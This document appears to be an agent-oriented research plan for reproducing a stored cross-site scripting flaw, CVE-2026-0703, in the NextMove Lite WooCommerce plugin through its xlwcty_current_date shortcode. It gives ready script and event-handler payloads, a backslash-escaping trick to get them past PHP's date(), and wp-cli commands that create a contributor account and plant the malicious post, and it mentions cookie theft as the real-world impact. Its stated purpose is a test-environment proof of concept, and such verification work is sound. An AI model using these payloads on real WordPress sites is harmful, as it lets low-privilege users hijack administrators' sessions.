Research Plan: CVE-2026-0703 - NextMove Lite Stored XSS via Shortcode

1. Vulnerability Summary

The NextMove Lite – Thank You Page for WooCommerce plugin (versions <= 2.23.0) is vulnerable to Stored Cross-Site Scripting (XSS) via the xlwcty_current_date shortcode. The vulnerability exists because the plugin fails to properly sanitize or escape user-supplied attributes within the shortcode's rendering logic. An authenticated attacker with Contributor level permissions (who can create posts but cannot use unfiltered_html) can inject malicious JavaScript into a post or page using this shortcode. The script will execute in the browser of any user (including administrators) who views the affected page.

2. Attack Vector Analysis

• Shortcode Name: xlwcty_current_date
• Vulnerable Attribute: Likely format, prefix, or suffix (inferred based on date shortcode patterns).
• Authentication Level: Authenticated (Contributor+).
• Preconditions: The plugin must be active. WooCommerce is likely required as a dependency for this plugin to function fully, but the shortcode rendering may be independent.
• Endpoint: The standard WordPress post/page editor or any area where shortcodes are processed.

3. Code Flow

1. Registration: The plugin registers the shortcode (likely in a frontend-facing class or during init) using add_shortcode( 'xlwcty_current_date', [ $this, 'render_current_date' ] ).
2. Processing: When a post is rendered, WordPress identifies the [xlwcty_current_date] tag and calls the associated callback function.
3. Attribute Handling: The callback function extracts attributes using shortcode_atts().
4. Sink: One or more of these attributes (e.g., a custom date format string or a wrapper) is concatenated into the return string without being passed through escaping functions like esc_html(), esc_attr(), or wp_kses().
5. Output: The final HTML string containing the malicious script is returned to the WordPress content filter and rendered in the browser.

4. Nonce Acquisition Strategy

This vulnerability involves Stored XSS via a shortcode.

• Post Creation: To store the payload, a Contributor creates a post. This can be done via wp-cli in the test environment (bypassing the need for CSRF nonces) or via the REST API/Classic Editor.
• Rendering: No nonce is required to trigger the XSS. The shortcode is executed automatically when the page is viewed.
• Plugin-Specific Nonces: While xlwcty-admin-app.js localizes xlwctyParams with ajax_nonce, search_products_nonce, and ajax_chosen, these are for admin-side AJAX operations and are not required for exploiting the shortcode rendering on the frontend.

5. Exploitation Strategy

1. Preparation: Identify the exact attributes accepted by the xlwcty_current_date shortcode. Standard date shortcodes often use format.
2. Payload Construction:
   • Primary Payload: [xlwcty_current_date format='<script>alert(document.domain)</script>']
   • Note: Since PHP's date() function might mangle the script tags if they are used as the format string, try escaping characters or using supplementary attributes if they exist (e.g., before or after).
   • Alternative Payload: [xlwcty_current_date format='\" autofocus onfocus=alert(1) '] (If the attribute is reflected inside an HTML tag).
3. Injection: Use wp-cli to create a post as a contributor with the shortcode.
4. Trigger: Use http_request to fetch the permalink of the newly created post.
5. Exfiltration/Impact: In a real scenario, this would be used to steal cookies or perform CSRF against an admin. For the PoC, alert() or a console log is sufficient.

6. Test Data Setup

Perform the following via wp_cli:

1. Create Contributor User:
   wp user create attacker attacker@example.com --role=contributor --user_pass=password123
2. Create Malicious Post:

   wp post create --post_type=post --post_status=publish --post_title="Thank You Date" --post_author=$(wp user get attacker --field=ID) --post_content='[xlwcty_current_date format="<script>console.log(\"XSS_TRIGGERED\")</script>"]'
   

3. Identify URL:
   wp post list --post_type=post --field=url --title="Thank You Date"

7. Expected Results

• When the post is requested via http_request, the response body should contain the literal string: <script>console.log("XSS_TRIGGERED")</script>.
• The script should not be entity-encoded (e.g., no <script>).

8. Verification Steps

1. HTML Inspection: Use http_request to get the page content and grep for the payload:

   # (Pseudocode for agent)
   response = http_request(post_url)
   if '<script>console.log("XSS_TRIGGERED")</script>' in response.body:
       print("Vulnerability Confirmed: Unescaped shortcode attribute found in output.")
   

2. Browser Execution: Use browser_navigate(post_url) and check for the console message or an alert.

9. Alternative Approaches

If the format attribute is processed by PHP's date() function (which would replace 's', 'c', 'r', 'i', 'p', 't' with date values):

• Bypass: Use the backslash to escape every character in the format string:
  [xlwcty_current_date format='\<\s\c\r\i\p\t\>\a\l\e\r\t\(\1\)\<\/\s\c\r\i\p\t\>']
• Search for other attributes: Check if the plugin supports prefix, suffix, before, or after attributes, which are likely concatenated directly without being passed through date().
  Example: [xlwcty_current_date suffix='<script>alert(1)</script>']
• Admin-Side Stored XSS: If the shortcode is used within the plugin's "Thank You Page" settings (which are managed in the admin dashboard), check if a Contributor can access those settings via the AJAX actions defined in xlwcty-admin.php (e.g., xlwcty_change_rule_type). However, the shortcode in post content is the most direct path.